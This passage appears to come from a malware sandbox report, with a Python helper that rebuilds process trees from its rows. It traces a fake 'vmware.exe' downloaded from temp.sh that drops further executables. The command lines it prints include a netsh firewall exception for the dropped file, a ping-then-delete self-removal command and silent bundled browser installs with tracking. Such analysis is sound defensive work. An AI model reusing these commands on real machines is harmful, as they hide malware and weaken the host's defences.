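PID 1756 wrote to memory of 1488 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe
PID 1488 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\WTLDR.exe
PID 1488 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe
PID 2156 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe
PID 1108 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe
PID 1568 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 2212 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe
PID 2212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe
PID 1108 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe
PID 1108 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\cmd.exe
PID 2340 wrote to memory of 2372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2556 wrote to memory of 2336 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
"""

ROW_RE = re.compile(r"PID (\d+) wrote to memory of (\d+) N/A (.*)$")


def parse_rows(text):
    """Return (image_by_pid, children_by_pid) from the report's rows.

    Both path columns start with 'C:\\' and neither contains ' C:\\', so the
    Process/Target split is unambiguous even though the paths contain spaces.
    """
    image, children = {}, {}
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError("unrecognised row: " + line)
        parent, child, rest = int(m.group(1)), int(m.group(2)), m.group(3)
        parts = rest.split(" C:\\")
        if len(parts) != 2:
            raise ValueError("expected exactly two paths in: " + rest)
        proc, target = parts[0], "C:\\" + parts[1]
        image.setdefault(parent, proc)
        image.setdefault(child, target)
        kids = children.setdefault(parent, [])
        if child not in kids:  # collapse the repeated write rows per child
            kids.append(child)
    return image, children


def roots(children):
    """PIDs nobody wrote to: the top of each tree (iexplore.exe and msiexec.exe here)."""
    all_children = {c for kids in children.values() for c in kids}
    return [p for p in children if p not in all_children]


def ancestry(pid, children):
    """Chain from the root down to pid, e.g. [1756, 1488, 2156, 1108, 1544]."""
    parent_of = {c: p for p, kids in children.items() for c in kids}
    chain = [pid]
    while chain[-1] in parent_of:
        chain.append(parent_of[chain[-1]])
    return list(reversed(chain))


def render(image, children, pid, depth=0, out=None):
    """Indented one-line-per-process view, file name and PID only."""
    out = [] if out is None else out
    name = image[pid].rsplit("\\", 1)[-1]
    out.append("  " * depth + f"{name} ({pid})")
    for kid in children.get(pid, []):
        render(image, children, kid, depth + 1, out)
    return out


if __name__ == "__main__":
    img, kids = parse_rows(ROWS)
    for root in roots(kids):
        print("\n".join(render(img, kids, root)))
        print()
    print("firewall change came from:", ancestry(1544, kids))
```

The same parser applies to any sandbox export in this row format; on a live host the equivalent map comes from Sysmon event 1 (ParentProcessId/ProcessId) rather than from memory-write events.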

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1756 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe

"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe"

C:\Users\Admin\AppData\Local\Temp\WTLDR.exe

"C:\Users\Admin\AppData\Local\Temp\WTLDR.exe"

C:\Users\Admin\AppData\Local\Temp\KLSetup.exe

"C:\Users\Admin\AppData\Local\Temp\KLSetup.exe"

C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe

"C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe" "chrome_protect.exe" ENABLE

C:\Users\Admin\AppData\Local\Temp\yadl.exe

"C:\Users\Admin\AppData\Local\Temp\yadl.exe" --partner 418804 --distr /quiet /msicl "YABROWSER=y YAQSEARCH=y YAHOMEPAGE=y VID=354"

C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe

"C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe" /quiet /msicl "YABROWSER=y YAQSEARCH=y YAHOMEPAGE=y VID=354"

C:\Users\Admin\AppData\Local\Temp\yadl.exe

C:\Users\Admin\AppData\Local\Temp\yadl.exe --stat dwnldr/p=418804/rid=8dbd23b5-3c00-4987-97f5-e26184e3f3be/sbr=0-0/hrc=200-200/bd=267-10639168/gtpr=1-1-1-255-1/cdr=0-b7-b7-ff-b7/for=3-0/fole=255-0/fwle=255-0/vr=ff-800b0109/vle=ff-800b0109/hovr=ff-0/hovle=ff-0/shle=ff-0/vmajor=6/vminor=1/vbuild=7601/distr_type=landing/cnt=0/dt=6/ct=2/rt=0 --dh 1528 --st 1719179742

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\netsh.exe

netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c ping 0 -n 2 & del "C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe"

C:\Windows\SysWOW64\PING.EXE

ping 0 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 24DFC157FCC18C17ADA55185C90E525E

C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe"

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe" -version

C:\Windows\system32\icacls.exe

C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

C:\Users\Admin\AppData\Local\Temp\7A211A2D-C79F-453E-9139-561FAC3D7E45\lite_installer.exe

"C:\Users\Admin\AppData\Local\Temp\7A211A2D-C79F-453E-9139-561FAC3D7E45\lite_installer.exe" --use-user-default-locale --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --YABROWSER

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

"C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe" -XX:+UseG1GC -Dfile.encoding=UTF-8 -jar "C:\Users\Admin\AppData\Roaming\.minecraft\KLauncher.exe"

C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe

"C:\Users\Admin\AppData\Local\Temp\947A51D1-902C-4954-B5DB-B39E2F620698\seederexe.exe" "--yqs=y" "--yhp=y" "--ilight=" "--oem=" "--nopin=n" "--pin_custom=n" "--pin_desktop=n" "--pin_taskbar=y" "--locale=us" "--browser=y" "--browser_default=" "--loglevel=trace" "--ess=" "--clids=C:\Users\Admin\AppData\Local\Temp\clids-yasearch.xml" "--sender=C:\Users\Admin\AppData\Local\Temp\12A0593A-69BF-4E3D-941E-7C00618D24D1\sender.exe" "--is_elevated=yes" "--ui_level=2" "--good_token=x" "--no_opera=n"

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe

C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent --pin-taskbar=y --pin-desktop=n

C:\Users\Admin\AppData\Local\Temp\12A0593A-69BF-4E3D-941E-7C00618D24D1\sender.exe

C:\Users\Admin\AppData\Local\Temp\12A0593A-69BF-4E3D-941E-7C00618D24D1\sender.exe --send "/status.xml?clid=6035492-354&uuid=cd6fd94f-AB17-40A5-842C-61F58DF30afc&vnt=Windows 7x64&file-no=6%0A10%0A11%0A12%0A13%0A15%0A17%0A18%0A21%0A22%0A24%0A25%0A40%0A42%0A43%0A45%0A57%0A61%0A89%0A103%0A111%0A123%0A124%0A125%0A129%0A"

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\java.exe

java.exe -version

C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe

"C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe" --job-name=yBrowserDownloader-{DB166274-067A-4BF5-95D7-B63D74DD1984} --send-statistics --local-path=C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe --YABROWSER --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --silent --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui=cd6fd94f-AB17-40A5-842C-61F58DF30afc --use-user-default-locale

C:\Users\Admin\AppData\Local\Temp\yb2B26.tmp

"C:\Users\Admin\AppData\Local\Temp\yb2B26.tmp" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\34b0acab-c04c-4dbc-be58-57d03fa2211b.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=268071600 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{DB166274-067A-4BF5-95D7-B63D74DD1984} --local-path="C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui=cd6fd94f-AB17-40A5-842C-61F58DF30afc --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\ad433c5e-3a65-4bd2-9f77-fbffa02e1fad.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"

C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\34b0acab-c04c-4dbc-be58-57d03fa2211b.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=268071600 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{DB166274-067A-4BF5-95D7-B63D74DD1984} --local-path="C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui=cd6fd94f-AB17-40A5-842C-61F58DF30afc --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\ad433c5e-3a65-4bd2-9f77-fbffa02e1fad.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico"

C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\34b0acab-c04c-4dbc-be58-57d03fa2211b.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --cumtom-welcome-page=https://browser.yandex.ru/promo/welcome_com/5/ --install-start-time-no-uac=268071600 --installer-brand-id=yandex --installer-partner-id=pseudoportal-ru --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --job-name=yBrowserDownloader-{DB166274-067A-4BF5-95D7-B63D74DD1984} --local-path="C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe" --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=0 --remote-url=http://downloader.yandex.net/downloadable_soft/browser/pseudoportal-ru/Yandex.exe?clid=6035461-354&ui=cd6fd94f-AB17-40A5-842C-61F58DF30afc --send-statistics --silent --source=lite --use-user-default-locale --variations-update-path="C:\Users\Admin\AppData\Local\Temp\ad433c5e-3a65-4bd2-9f77-fbffa02e1fad.tmp" --verbose-logging --yabrowser --yandex-website-icon-file="C:\Users\Admin\AppData\Local\Temp\website.ico" --verbose-logging --run-as-admin --target-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application" --child-setup-process --restart-as-admin-time=299628600

C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe

C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=a3028db1baffc0578427f8e443889a44 --annotation=main_process_pid=5632 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0x1b0,0x1b4,0x1b8,0x184,0x1bc,0x6c1cbc,0x6c1cc8,0x6c1cd4

C:\Windows\TEMP\sdwra_5632_436080900\service_update.exe

"C:\Windows\TEMP\sdwra_5632_436080900\service_update.exe" --setup

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --install

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --run-as-service

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=a3028db1baffc0578427f8e443889a44 --annotation=main_process_pid=9544 --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0x13c,0x140,0x144,0x110,0x148,0x2ab728,0x2ab734,0x2ab740

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --update-scheduler

C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe

"C:\Program Files (x86)\Yandex\YandexBrowser\24.6.0.1878\service_update.exe" --update-background-scheduler

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Temp\clids.xml"

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\source5632_1102270951\Browser-bin\clids_yandex_second.xml"

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --progress-window=0 --install-start-time-no-uac=268071600

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id= --annotation=main_process_pid=9252 --annotation=metrics_client_id=eebb1e7f281049b7b63c8a71002f524a --annotation=plat=Win32 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.6.0.1878 --initial-client-data=0xf4,0xf8,0xfc,0xc8,0x100,0x70f45a28,0x70f45a34,0x70f45a40

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --gpu-process-kind=sandboxed --field-trial-handle=1816,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=1812 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --gpu-process-kind=trampoline --field-trial-handle=1708,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2028 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Network Service" --field-trial-handle=2016,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2152 --brver=24.6.0.1878 /prefetch:3

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Storage Service" --field-trial-handle=2324,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2336 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=ru --service-sandbox-type=audio --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Audio Service" --field-trial-handle=2844,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=2924 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --extension-process --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --enable-ignition --allow-prefetch --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3068,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3064 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --enable-ignition --allow-prefetch --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3536,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3532 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=ru --service-sandbox-type=none --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Импорт профилей" --field-trial-handle=3500,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3660 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=3252,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3508 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --no-appcompat-clear --enable-ignition --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3660,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=3816,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4156 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --gpu-process-kind=sandboxed --field-trial-handle=2020,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4116 /prefetch:2

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --no-appcompat-clear --enable-ignition --disable-gpu-compositing --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=1960,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3996 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --no-appcompat-clear --process-name="Data Decoder Service" --field-trial-handle=3888,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=3900 --brver=24.6.0.1878 /prefetch:8

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=cd6fd94f-AB17-40A5-842C-61F58DF30afc --brand-id=yandex --partner-id=pseudoportal-ru --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --ya-custo-process --enable-instaserp --no-appcompat-clear --enable-ignition --disable-gpu-compositing --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4576,i,5844591098871488284,10895279794211445282,262144 --enable-features=InstallerNewIdentity2024 --variations-seed-version --mojo-platform-channel-handle=4592 /prefetch:1

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe

